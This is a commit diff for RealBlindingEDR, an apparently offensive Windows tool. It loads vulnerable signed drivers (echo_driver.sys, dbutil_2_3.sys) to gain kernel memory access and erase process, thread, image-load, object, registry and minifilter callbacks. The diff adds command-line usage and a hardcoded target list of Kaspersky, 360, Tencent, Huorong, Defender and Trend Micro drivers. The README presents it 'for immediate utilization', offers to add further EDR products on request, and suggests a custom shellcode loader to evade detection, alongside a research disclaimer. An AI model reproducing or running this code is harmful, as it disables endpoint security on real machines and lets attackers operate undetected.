Support blinding various EDR products

README.md

@@ -6,6 +6,12 @@ Utilize arbitrary address read/write implementation with signed driver: complete
 
 If you want to understand the implementation principle, you can refer to the analysis article: [AV/EDR 完全致盲 - 清除6大内核回调实现（Chinese）](https://mp.weixin.qq.com/s/ZMTjDMMdQoOczxzZ7OAGtA)
 
+For immediate utilization, this update is released:
+
+**Supports blinding/permanent shutdown: 360 Security Guard, 360 Enterprise Edition, Tianqing V10, Tencent Computer Manager, Tinder/Tinder Enterprise Edition, Kaspersky Enterprise Edition, AsiaInfo EDR, Windows Defender.**
+
+**Note:** If you have other EDR products that need to be blinded, you can send me the installation package and I will implement it according to the situation.
+
 **Currently tested on 64-bit Windows 7/10/11 and Windows Server 2008R2/2012R2/2016/2019/2022. If you find a problem in a certain version, you can report it through issue and I will adapt it.**
 
 
@@ -40,36 +46,21 @@ This project is not targeted at any AV/EDR manufacturers. The code examples are
 
 ## Usage
 
-1. Download the project code, open the `RealBlindingEDR.h` file, and configure the absolute path where the available driver is located.
+![](assets/17025384797366.jpg)
+
+This project supports two driver applications: [dbutil_2_3.sys](https://www.loldrivers.io/drivers/a4eabc75-edf6-4b74-9a24-6a26187adabf/) (supports win7 and above versions, but the antivirus flag is relatively small More), [echo_driver.sys](https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/) (supports win10 and above versions)
+
+1. Use echo_driver.sys driver for blinding:
 
-	This project supports two driver applications: [dbutil_2_3.sys](https://www.loldrivers.io/drivers/a4eabc75-edf6-4b74-9a24-6a26187adabf/) 、[echo_driver.sys](https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/)
+    `RealBlindingEDR.exe c:\echo_driver.sys 1`
 
-	`#define DriverType 1` means using echo_driver.sys
-
-   `#define DriverType 2` means using dbutil_2_3.sys
-
-   `#define DrivePath "driver_fullpath"` is used to specify the path where the driver is located
-
-    The dbutil_2_3.sys driver supports win7 and above.
-
-    The echo_driver.sys driver supports win10 and above.
-
-    **Note:** Currently, these two drivers cannot be loaded on the latest version of Win11 [10.0.22621.2506] (certificate revoked, error: c0000603)
-
-2. Compile the project and double-click to execute it on the computer with AV/EDR installed. (If the file is not immune to anti-virus, please write your own anti-virus shellcode loader, then convert it into shellcode and load it)
-3. After execution, you will see the following effect: (listing the names of all drivers that registered these callbacks)
-
-     ![](assets/16984937060550.jpg)
-
-4. It's not over yet. You need to open the `RealBlindingEDR.h` file again, find out the driver name of AV/EDR in the output result of step 3 (you can judge it through Google or search local files), and add it to `CONST CHAR* AVDriver[ ] = {}` in the array.
-
-    An example of configuring the Defender driver:
-    ![](assets/16984942671759.jpg)
-
-    **Note:** Be sure not to add the normal driver name of the Windows system to this array, otherwise it may cause the system to crash.
-5. Compile again and run it directly to automatically clear all the above callbacks of the specified driver (the name of the driver with deleted callbacks will be followed by a [Clear] flag).
-6. If you run it again, you will find that there are no AV/EDR names in these output callbacks.
-7. Do what you want.
+2. Use the dbutil_2_3.sys driver for blinding:
+
+    `RealBlindingEDR.exe c:\dbutil_2_3.sys 2`
+
+**Note:** Currently, these two drivers cannot be loaded on the latest version of Win11 [10.0.22621.2506] (certificate revoked, Error: c0000603)
+
+**Preview:** The third driver application will be released soon, supporting win7 - win11 (latest version).
 
 ## Effect
 The following demonstration content is not specific to this AV manufacturer, but is only for educational and research purposes. Most AV/EDR manufacturers are affected.

README.zh_CN.md

@@ -4,8 +4,15 @@
 
 如果你想了解实现原理可以参考分析文章：[AV/EDR 完全致盲 - 清除6大内核回调实现](https://mp.weixin.qq.com/s/ZMTjDMMdQoOczxzZ7OAGtA)    [欢迎关注此公众号]
 
+为了便于直接利用，发布此更新：
+
+**支持致盲/永久关闭：360 安全卫士、360 企业版、天擎V10、腾讯电脑管家、火绒/火绒企业版、卡巴斯基企业版、亚信EDR、Windows Defender。**
+
+**注：** 如果你有其他需要致盲的EDR产品可以发我安装包，我会根据情况实现。
+
 **当前已在64位的 Windows 7/10/11、Windows Server 2008R2/2012R2/2016/2019/2022 完成测试。如果你发现在某个版本有问题，可通过issue 反馈，我会进行适配。**
 
+
 ## 简介
 
 本项目实现了以下内核回调的清除：
@@ -35,38 +42,25 @@
 
 本项目不针对任何AV/EDR 厂商，代码示例仅用于研究学习，不得进行恶意利用，如有恶意利用与本人无关。
 
-## 使用方式
+## 使用方法
 
-1. 下载项目代码，打开`RealBlindingEDR.h` 文件，配置可利用驱动所在的绝对路径。
-
-	本项目支持两种驱动利用：[dbutil_2_3.sys](https://www.loldrivers.io/drivers/a4eabc75-edf6-4b74-9a24-6a26187adabf/) 、[echo_driver.sys](https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/)
-
-    `#define DriverType 1`  表示使用echo_driver.sys
-
-    `#define DriverType 2`  表示使用dbutil_2_3.sys
-
-    `#define DrivePath "driver_fullpath"`  用于指定驱动所在路径
-
-    dbutil_2_3.sys 驱动支持win7及以上版本。
-	 
-	 echo_driver.sys 驱动支持win10及以上版本。
-	 
-	 **注意：** 目前这两个驱动在最新版Win11[10.0.22621.2506]上都已无法加载（证书被吊销,Error：c0000603）
-	 
-2. 编译项目并在安装有AV/EDR 的电脑上双击执行。(如果文件不免杀，请自行编写免杀的shellcode 加载器，然后将其转换成shellcode 后加载)
-3. 执行后你会看到下面的效果：（列出了注册这些回调的所有驱动名称）
-
-    ![](assets/16984937060550.jpg)
+![](assets/17025384797366.jpg)
 
-4. 别急，还没结束。你需要再次打开`RealBlindingEDR.h` 文件，找出第3步输出结果里是AV/EDR的驱动名称（你可以通过Google 或搜索本地文件来判断），并将其添加到`CONST CHAR* AVDriver[] = {}` 数组中。
+本项目支持两种驱动利用：[dbutil_2_3.sys](https://www.loldrivers.io/drivers/a4eabc75-edf6-4b74-9a24-6a26187adabf/)（支持win7及以上版本，但被杀软标记较多） 、[echo_driver.sys](https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/)（支持win10及以上版本）
+
+1. 使用echo_driver.sys 驱动进行致盲:
+
+	`RealBlindingEDR.exe c:\echo_driver.sys 1`
+
+2. 使用dbutil_2_3.sys 驱动进行致盲:
+
+	`RealBlindingEDR.exe c:\dbutil_2_3.sys 2`
 
-   一个配置Defender 驱动的样例：
-    ![](assets/16984942671759.jpg)
+**注意：** 目前这两个驱动在最新版Win11[10.0.22621.2506]上都已无法加载（证书被吊销,Error：c0000603）
+
+**预告：** 即将发布第三个驱动利用程序，支持win7 - win11（最新版）。
 
-   **注意：** 一定不要添加Windows系统正常的驱动名到此数组中，否则可能会导致系统崩溃。  
-5. 再次编译并直接运行，就能自动清除指定驱动的上述所有回调（已删除回调的驱动，其名称后面会跟一个[Clear] 标志）。
-6. 如果你再一次运行，就会发现这些输出的回调中已经没有AV/EDR的名称了。
-7. 做你想做的。
+
 
 ## 效果
 下面演示内容并不针对此AV 厂商，仅出于教育研究目的，绝大多数AV/EDR 厂商都能达到同样的效果。
@@ -94,8 +88,6 @@
 
 ## 致谢
 
-***PS:*** 特别感谢我的领导能给我足够的时间去研究，最终才能有此项目。
-
 感谢以下文章和项目，给我思路上的帮助。
 1. [OBREGISTERCALLBACKS AND COUNTERMEASURES](https://douggemhax.wordpress.com/2015/05/27/obregistercallbacks-and-countermeasures/)
 2. [Windows Anti-Debug techniques - OpenProcess filtering](https://blog.xpnsec.com/anti-debug-openprocess/)

RealBlindingEDR/RealBlindingEDR/RealBlindingEDR.cpp

@@ -60,13 +60,19 @@ BOOL LoadDriver() {
 		}
 		else
 		{
-			printf("Error Code: % lx\n", errcode);
+			if (errcode == 0xc0000603) {
+				printf("The driver's certificate has been revoked, please wait for the project to be updated..\n");
+			}
+			else {
+				printf("Error Code: % lx.\n", errcode);
+			}
+
 			return FALSE;
 		}
 
 	}
 	else {
-		printf("Reg Add Error!\n");
+		printf("Reg Add Error, The program needs to be run with administrator privileges!\n");
 		return FALSE;
 	}
 }
@@ -99,8 +105,8 @@ VOID UnloadDrive() {
 	}
 }
 BOOL InitialDriver() {
-	//win7 加载此驱动崩溃，和后面代码逻辑无关
-	if (DriverType == 1) {
+	//win7 加载此驱动崩溃，和后面代码逻辑无关
+	if (Driver_Type == 1) {
 		hDevice = CreateFile(L"\\\\.\\EchoDrv", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 		if (hDevice == INVALID_HANDLE_VALUE) {
 			if (LoadDriver()) {
@@ -132,7 +138,7 @@ BOOL InitialDriver() {
 		}
 		Process = param->handle;
 	}
-	else if (DriverType == 2) {
+	else if (Driver_Type == 2) {
 		hDevice = CreateFile(L"\\\\.\\DBUtil_2_3", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 		if (hDevice == INVALID_HANDLE_VALUE) {
 			if (LoadDriver()) {
@@ -175,7 +181,7 @@ VOID DellWrite(VOID* Address, LONGLONG value) {
 	//printf("%d\n", BytesRead);
 }
 VOID DriverWriteMemery(VOID* fromAddress, VOID* toAddress, size_t len) {
-	if (DriverType == 1) {
+	if (Driver_Type == 1) {
 		ReadMem* req = (ReadMem*)malloc(sizeof(ReadMem));
 		req->fromAddress = fromAddress;
 		req->length = len;
@@ -188,7 +194,7 @@ VOID DriverWriteMemery(VOID* fromAddress, VOID* toAddress, size_t len) {
 			CloseHandle(hDevice);
 		}
 	}
-	else if (DriverType == 2) {
+	else if (Driver_Type == 2) {
 		if (len == 8) {
 			INT64* InttoAddress = (INT64*)toAddress;
 			INT64 dataAddr = DellRead(fromAddress);
@@ -417,10 +423,6 @@ VOID ClearThreeCallBack() {
 	INT64 PspCreateThreadNotifyRoutineAddress = GetPspNotifyRoutineArray((CHAR*)"PsSetCreateThreadNotifyRoutine");
 	INT64 PspLoadImageNotifyRoutineAddress = GetPspNotifyRoutineArray((CHAR*)"PsSetLoadImageNotifyRoutine");
 
-	//printf("PspCreateProcessNotifyRoutineAddress: %I64x\n", PspCreateProcessNotifyRoutineAddress);
-	//printf("PspCreateThreadNotifyRoutineAddress: %I64x\n", PspCreateThreadNotifyRoutineAddress);
-	//printf("PspLoadImageNotifyRoutineAddress: %I64x\n", PspLoadImageNotifyRoutineAddress);
-
 	if (PspCreateProcessNotifyRoutineAddress) {
 		PrintAndClearCallBack(PspCreateProcessNotifyRoutineAddress, (CHAR*)"PsSetCreateProcessNotifyRoutine");
 	}
@@ -528,7 +530,6 @@ VOID RemoveObRegisterCallbacks(INT64 PsProcessTypeAddr, INT flag) {
 		DriverWriteMemery((VOID*)(Flink + 40), &EDRPreOperation, 8);
 		INT64 EDRPostOperation = 0;
 		DriverWriteMemery((VOID*)(Flink + 48), &EDRPostOperation, 8);
-		//printf("%s: EDRPreOperation: %I64x , %s: EDRPostOperation: %I64x \n", GetDriverName(EDRPreOperation), EDRPreOperation, GetDriverName(EDRPostOperation), EDRPostOperation);
 		CHAR* DriverName1 = GetDriverName(EDRPreOperation);
 		if (DriverName1 != NULL) {
 			if (IsEDR(DriverName1)) {
@@ -552,7 +553,7 @@ VOID RemoveObRegisterCallbacks(INT64 PsProcessTypeAddr, INT flag) {
 		CHAR* DriverName2 = GetDriverName(EDRPostOperation);
 		if (DriverName2 != NULL) {
 			if (IsEDR(DriverName2)) {
-				//清除回调
+				//清除回调
 				DriverWriteMemery(data, (VOID*)(Flink + 48), 8);
 				if (flag == 1) {
 					printf("Process PreOperation: %s [Clear]\n", DriverName2);
@@ -592,8 +593,6 @@ VOID ClearObRegisterCallbacks() {
 	printf("----------------------------------------------------\n");
 	printf("Drivers that register ObRegisterCallbacks callbacks: \n----------------------------------------------------\n\n");
 
-	/*printf("PsProcessTypeAddr: %I64x\n", PsProcessTypeAddr);
-	printf("PsThreadTypeAddr: %I64x\n", PsThreadTypeAddr);*/
 	RemoveObRegisterCallbacks(PsProcessTypeAddr, 1);
 	RemoveObRegisterCallbacks(PsThreadTypeAddr, 2);
 
@@ -626,7 +625,6 @@ VOID ClearCmRegisterCallback() {
 	}
 	printf("----------------------------------------------------\n");
 	printf("Register the CmRegisterCallback callback driver: \n----------------------------------------------------\n\n[Clear all below]\n");
-	//printf("CmUnRegisterCallbackAddr: %I64X\n", CmUnRegisterCallbackAddr);
 	UINT64 PsOffset = 0;
 
 	BYTE tmp[1] = { 0 };
@@ -733,7 +731,6 @@ BOOL IsEDRIntance(INT j, INT64 Flink) {
 	if (FilterName == NULL) return 0;
 	printf("\t\t[%d] %s : %I64x [Clear]\n", j, FilterName, Flink - 0x10);//_CALLBACK_NODE
 
-	//printf("EDRIntance: %d\n", k);
 	return Flag;
 }
 VOID RemoverInstanceCallback(INT64 FLT_FILTERAddr) {
@@ -760,7 +757,6 @@ VOID RemoverInstanceCallback(INT64 FLT_FILTERAddr) {
 		DriverWriteMemery((VOID*)(FilterInstanceAddr), &tmpAddr, 8);
 		FilterInstanceAddr = tmpAddr;
 	} while (FirstLink != FilterInstanceAddr);
-	//printf("\t\t%d\n",count);
 	count--;
 	INT i = 0;
 	do {
@@ -828,7 +824,6 @@ VOID ClearMiniFilterCallback() {
 		}
 		count++;
 	}
-	//printf("%I64x\n", FltEnumerateFiltersAddr);
 
 	UINT64 PsOffset = 0;
 
@@ -876,11 +871,9 @@ VOID ClearMiniFilterCallback() {
 	INT64 FLT_VOLUMESAddr = 0;
 	DriverWriteMemery((VOID*)(FLT_FRAMEAddr + 0x130), &FLT_VOLUMESAddr, 8);
 
-	//printf("FLT_VOLUMESAddr111 ,%I64x\n", FLT_VOLUMESAddr);
 	ULONG FLT_VOLUMESCount = 0;
 	DriverWriteMemery((VOID*)(FLT_FRAMEAddr + 0x140), &FLT_VOLUMESCount, 4);
 
-	//printf("FLT_VOLUMESCount %d\n", FLT_VOLUMESCount);
 
 	i = 0;
 	do {
@@ -952,13 +945,34 @@ VOID ClearMiniFilterCallback() {
 
 }
 
-int main()
+int main(int argc, char* argv[])
 {
+	printf(" _______               __  ______  __   _               __  _               ________ ______  _______     \n");
+	printf("|_   __ \\             [  ||_   _ \\[  | (_)             |  ](_)             |_   __  |_   _ `|_   __ \\    \n");
+	printf("  | |__) | .---. ,--.  | |  | |_) || | __  _ .--.  .--.| | __  _ .--.  .--./)| |_ \\_| | | `. \\| |__) |   \n");
+	printf("  |  __ / / /__\\`'_\\ : | |  |  __'.| |[  |[ `.-. / /'`\\' |[  |[ `.-. |/ /'`\\;|  _| _  | |  | ||  __ /    \n");
+	printf(" _| |  \\ \\| \\__.// | |,| | _| |__) | | | | | | | | \\__/  | | | | | | |\\ \\._/_| |__/ |_| |_.' _| |  \\ \\_  \n");
+	printf("|____| |___'.__.\\'-;__[___|_______[___[___[___||__'.__.;__[___[___||__.',__|________|______.|____| |___| \n");
+	printf("                                                                     ( ( __))                            \n");
+	if (argc != 3) {
+		printf("Usage: RealBlindingEDR.exe [driver_path] [driver_type]\n\neg: RealBlindingEDR.exe c:\\echo_driver.sys 1\n");
+		return 0;
+	}
+	DrivePath = argv[1];
+	Driver_Type = atoi(argv[2]);
+
 	HINSTANCE hinst = LoadLibraryA("ntdll.dll");
 	if (hinst == NULL) return FALSE;
 	NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers");
 	proc(&dwMajor, &dwMinorVersion, &dwBuild);
 	dwBuild &= 0xffff;
+	if (dwMajor < 10 && Driver_Type == 1) {
+		printf("[ERROR] This driver does not support the %d.%d.%d version.\n", dwMajor, dwMinorVersion, dwBuild);
+		return 0;
+	}
+	else {
+		printf("Windows version: %d.%d.%d version.\n", dwMajor, dwMinorVersion, dwBuild);
+	}
 	if (!InitialDriver()) return 0;
 
 	ClearThreeCallBack();
@@ -967,6 +981,6 @@ int main()
 	ClearMiniFilterCallback();
 
 	UnloadDrive();
-	system("pause");
+	//system("pause");
 }
 

RealBlindingEDR/RealBlindingEDR/RealBlindingEDR.h

@@ -5,18 +5,26 @@
 #pragma comment(lib,"ntdll.lib")
 
 /*
-DriverType specifies different drivers
+Driver_Type specifies different drivers
 1 -> echo_driver.sys driver, supports win10+
 2 -> dbutil_2_3.sys driver, supports Win7+ (may not be loaded in higher versions such as win11)
 */
 
-#define DriverType 1
+INT Driver_Type = 0;
 
 //Specify the location of the driver
-#define DrivePath "C:\\ProgramData\\echo_driver.sys"
+CHAR* DrivePath = NULL;
 
 //Set the driver name to be cleared
 CONST CHAR* AVDriver[] = {
+	"klflt.sys","klhk.sys","klif.sys","klupd_KES-21-9_arkmon.sys","KLIF.KES-21-9.sys","klbackupflt.KES-21-9.sys",
+	"QaxNfDrv.sys","QKBaseChain64.sys","QKNetFilter.sys","QKSecureIO.sys","QesEngEx.sys","QkHelp64.sys","qmnetmonw64.sys",
+	"QMUdisk64_ev.sys","QQSysMonX64_EV.sys","TAOKernelEx64_ev.sys","TFsFltX64_ev.sys","TAOAcceleratorEx64_ev.sys","QQSysMonX64.sys","TFsFlt.sys",
+	"sysdiag_win10.sys","sysdiag.sys",
+	"360AvFlt.sys",
+	"360qpesv64.sys","360AntiSteal64.sys","360AntiSteal.sys","360qpesv.sys","360FsFlt.sys","360Box64.sys","360netmon.sys","360AntiHacker64.sys","360Hvm64.sys","360qpesv64.sys","360AntiHijack64.sys","360AntiExploit64.sys","DsArk64.sys","360Sensor64.sys","DsArk.sys", 
+	"WdFilter.sys","MpKslDrv.sys","mpsdrv.sys","WdNisDrv.sys","win32k.sys",
+	"TmPreFilter.sys","TmXPFlt.sys",
 	NULL
 };